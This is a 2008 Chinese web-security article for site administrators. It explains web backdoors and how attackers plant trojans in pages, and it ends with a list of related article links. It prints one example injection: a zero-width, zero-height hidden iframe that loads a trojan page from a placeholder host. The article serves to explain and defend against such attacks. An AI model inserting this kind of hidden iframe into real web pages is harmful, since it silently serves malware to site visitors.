解析网页后门和挂马

新客网 XKER.COM 2008-03-06 来源：it168 甘肃老五 收藏本文

 网站被挂马，被植入后门，这是管理员们无论如何都无法忍受的。Web服务器被攻克不算，还“城门失火殃及池鱼”，网站的浏览者也不能幸免。这无论是对企业的信誉，还是对管理员的技术能力都是沉重的打击。下面笔者结合实例对网页后门及其网页挂马的技术进行解析，知己知彼，拒绝攻击。

    一、前置知识
    网页后门其实就是一段网页代码，主要以ASP和PHP代码为主。由于这些代码都运行在服务器端，攻击者通过这段精心设计的代码，在服务器端进行某些危险的操作，获得某些敏感的技术信息或者通过渗透，提权获得服务器的控制权。并且这也是攻击者控制服务器的一条通道，比一般的入侵更具有隐蔽性。

    网页挂马就是攻击者通过在正常的页面中（通常是网站的主页）插入一段代码。浏览者在打开该页面的时候，这段代码被执行，然后下载并运行某木马的服务器端程序，进而控制浏览者的主机。

    二、网页挂马的类型
    1、框架嵌入式网络挂马
网页木马被攻击者利用iframe语句，加载到任意网页中都可执行的挂马形式，是最早也是最有效的的一种网络挂马技术。通常的挂马代码如下：

    <iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>

    解释：在打开插入该句代码的网页后，就也就打开了http://www.xxx.com/muma.html页面，但是由于它的长和宽都为“0”，所以很难察觉，非常具有隐蔽性。下面我们做过做个演示，比如在某网页中插入如下代码：

    <iframe src= width=200 height=200></iframe>
    在“百度”中嵌入了“IT168安全版块”的页面，效果如图1。（图1）

• ·轻松挖出恶意网站中藏的病毒
• ·解析网页后门和挂马
• ·[攻防手记]SQL存储过程带来的安全危险
• ·区分正邪两类黑客的四大主要行为
• ·多角度详细解释网站安全保护方法
• ·网络组网时路由器能替代防火墙吗?
• ·安全技巧：学会检查SQL注入式攻击漏洞
• ·对付黑客用Tcptrack跟踪TCP连接
• ·有备无患 畅游网络世界的十大安全技巧
• ·通过客户端上网流程发现是否挂马
• ·合理规划：构建网络整体安全方案
• ·陈冠希事件的启示 明星网络安全防范手册
• ·视频文件夹带木马的常见应对策略
• ·九大策略 保护用户计算机远离黑客骚扰
• ·如何利用加密方法保障电子邮件系统安全
• ·娱乐也要安全 剔除电影中暗藏的木马